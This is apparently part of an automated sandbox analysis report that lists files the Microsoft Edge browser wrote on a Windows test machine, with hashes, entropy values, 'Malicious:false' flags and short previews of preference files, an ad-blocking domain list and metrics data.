                                                                                                                                                                                                                                                                                                                        Size (bytes):46220
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.087145454649764
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:gMkbJrT8IeQc5dK4ob/bi1zNtmU9v19ULlkFo/PvXDgh1+wLCioBJDSgzMMd6qDT:gMk1rT8H1K4x1Evkh8wLFoBtSmd6qE7I
                                                                                                                                                                                                                                                                                                                        MD5:9EE981904C5B926F2C07F959C103E490
                                                                                                                                                                                                                                                                                                                        SHA1:ADBADC6F088AA26C4314F0EF20CDD2AF7F1B99DF
                                                                                                                                                                                                                                                                                                                        SHA-256:F69072E7C2AFA148F8A8B64CD91211B82B8C3D079CFEFEA55112E99A8E095C4E
                                                                                                                                                                                                                                                                                                                        SHA-512:3573D3D67A687BC4DF828894BF9BDCE0DDE14D25DB73754BD57F117E19CCEFFA32022CA947DB1D1C1C75A275719FAF660C7646BF11A08F19AF4CB9CB3825ED7A
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326025230846","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852429"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9efe5959-fa1f-4c0c-a068-40538c152659.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                        Size (bytes):44906
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.095043527219012
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWN4i1zNtmU9v1NPLDGfPb9chcKJDSgzMMd6qD47u3S:+/Ps+wsI7ynO1IKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:CB52F51D1018539BEC0E1487D61CB467
                                                                                                                                                                                                                                                                                                                        SHA1:F0B5F0F46F36080EB2BF402958BF472D7C2FE648
                                                                                                                                                                                                                                                                                                                        SHA-256:B74327343B71BB98BA3EB23299F6ECD43FFF9451326EC48DDD0B205BEDC6B1DC
                                                                                                                                                                                                                                                                                                                        SHA-512:A6AACECCBACB000057D117F29015E57D537CD409D5C21DF0959D9D0C31E0B4B9F9792A0485F250957B9878C655805C6394EB801D34BB0C596A4AB9AC92DD1486
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\2961f7d2-33d2-4654-a727-f2771383c4b3.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                                                        MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                                                        SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                                                        SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                                                        SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                                                        MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                                                        SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                                                        SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                                                        SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D07-1540.pma

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.44526047589972767
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:4iIfEyesuaS6EIEWLum0/Cg1HFoO3ZSPGUgVv/sdOJbhgDvuIg1HF8f:ofEba1ESx0/CaHr3OGr8dOJlgqIaH
                                                                                                                                                                                                                                                                                                                        MD5:5E67DA3DC87E991BB8385012003E835D
                                                                                                                                                                                                                                                                                                                        SHA1:D27623C0D56E3CA7440FFBF24836D494A4CBBEA7
                                                                                                                                                                                                                                                                                                                        SHA-256:8A234CB0C42986CFD8AF1C2045AFAF4EB18C3988B25F74321AFC1AB8FAB669BD
                                                                                                                                                                                                                                                                                                                        SHA-512:FD1AE499C7795C48D91BA5D922F4D01E9B9B16DD8C10C76F4C39BC594770F5C9BD46627C531B98C003CABF773C04041A8E17DB63D90DD1098895FAA947C31F37
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".uoairp20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K.u.$r.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.............. .2......._.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D13-2348.pma

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0455239273725186
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:9vl0pqtmCnOAbYiJxwasggLXs9IgVkDQMahfVNWAsM1gQ4ZaHagn8y08Tcm2RGOD:Rl0ctlTKdW9hNqsg2HV08T2RGOD
                                                                                                                                                                                                                                                                                                                        MD5:03C7B2A2A01B09447E8AF013BBC36A95
                                                                                                                                                                                                                                                                                                                        SHA1:B8482600DD93847DF094D933FB3F60B3E8FFA67F
                                                                                                                                                                                                                                                                                                                        SHA-256:EC03F7B078E814229775454483410D11D71EF944ABD2FAFC1B561C615C9F4A47
                                                                                                                                                                                                                                                                                                                        SHA-512:237C2B1E58BB50F8FAD8F2E5B9D2C06A8C820EA7F211F1BD617A081CC2726825B4FBA2C85B2C0A9E7DA6539EB3EC251E6D231D988DA9ECAE16E2A198DA54BAC2
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@................f...V..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".uoairp20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..Uu.$r.>.........."....."...24.."."Pix2JTi/qPpG0ze4j+ppl2Ojlzu4BAlqU2ZsJeeyOPQ="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........5...... .2...............

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1178481630180475
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:FiWWltlcUENPwFAb010YHltwBVP/Sh/JzvbYuDRBOc7cEJH1l:o1cU2P/hKwBVsJDbYuDRBOyc
                                                                                                                                                                                                                                                                                                                        MD5:F9BF657D7F79B14C5948157B2401A614
                                                                                                                                                                                                                                                                                                                        SHA1:F577E9796F4C12A4CF8E0D3D1C5F4970586D20CA
                                                                                                                                                                                                                                                                                                                        SHA-256:401290468ECDDBD15F9C853899BF56F7E36095963870E8B9215444CA68BCEC73
                                                                                                                                                                                                                                                                                                                        SHA-512:3D907ADF53870FCFABB57229641EC8E0D2F96D3E9964222949B4670532BB8D3121661AC3E67CC95CB5E123354C37EE39A15184B3DC6FEA63E29AE4EED3EB1DC3
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:sdPC.....................cT..\.E.....P."Pix2JTi/qPpG0ze4j+ppl2Ojlzu4BAlqU2ZsJeeyOPQ="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\2bc0d705-c9b6-4fd0-8e93-9b0bc0925188.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):13111
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2662098336366725
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:stQJ99QTryDiTbatSuyiskCUaFvrEVL9Rk3V3z82bV+FiAN2O8U6P/hYJ:stQPGoSufskXCDwL92bGiy2On1
                                                                                                                                                                                                                                                                                                                        MD5:2131EFFFAFC937786EF8916A41AA2323
                                                                                                                                                                                                                                                                                                                        SHA1:CF368E96DBA754C26213C13DA81F7BA79A162A78
                                                                                                                                                                                                                                                                                                                        SHA-256:7ECF1F40E24F564A6CC78989991F36444FDEF829A2791447673A2F9FD3882830
                                                                                                                                                                                                                                                                                                                        SHA-512:51537F0D0812A160EEAF8CAF6CC817CDA807E561D59499910BBAA95148F100AFE333F69ABE7C1DAA44020F9BD144E11593DF3ACD1A800DC5A9B75FE310903669
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326025114093","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4a578ff9-abcc-4d13-9337-39cf2e9d8d3f.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7a06e28f-cfc8-407c-80d4-5167301b5ba7.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):9261
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.09800214942593
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:stwSjskCUaFvrEmk3V3z88bV+FiAuCU6P/hYJ:stwYskXCDIbGiXp1
                                                                                                                                                                                                                                                                                                                        MD5:BE6FF18F2725E884CE8450DC8EA28035
                                                                                                                                                                                                                                                                                                                        SHA1:D5F01124EB2225AC68DFBF6E7A08593EB9B536CE
                                                                                                                                                                                                                                                                                                                        SHA-256:D6A7E9821195DEC9F115B89E12D8D12932F4C67FF579C9C496C40EF90B0785D5
                                                                                                                                                                                                                                                                                                                        SHA-512:26A6E03BA15B9AF9E76AB09CF6DE946BB30E56CC7F85C10367F751522912AFF18CE360773DB7EF6BC89F35B757BA38CE39FD4BA2A75D092C5C2615A3C8BD5DA1
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326025114093","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326024597217","domain_dive

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\96323371-d328-4bfc-a38c-57c2297cad5e.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):13276
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.264200164129175
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:stQJ99QTryDiTbatSuyiskCUaFvrEVL9Rk3V3z82bV+FiAy2O436P/hYJ:stQPGoSufskXCDwL92bGix2O431
                                                                                                                                                                                                                                                                                                                        MD5:553367B5DFD1D15E96960E2D163CF6FB
                                                                                                                                                                                                                                                                                                                        SHA1:DF1A042D9BC0B15ADEAB4FBB69FD67567F8561B4
                                                                                                                                                                                                                                                                                                                        SHA-256:8FBC1D89CAADBE38E1ECB94CCB160113901531BA18D796AB273B8A0A9F2D74E0
                                                                                                                                                                                                                                                                                                                        SHA-512:64B9AA9A9A453913A4789F0D40473A689DF23F74CB17F03E8F9388C76F1CEC492833BF3779EEEE9AB8DD97945BADB9E74D237A2AE311242FB3113B8C974D980A
                                                                                                                                                                                                                                                                                                                        Malicious:false
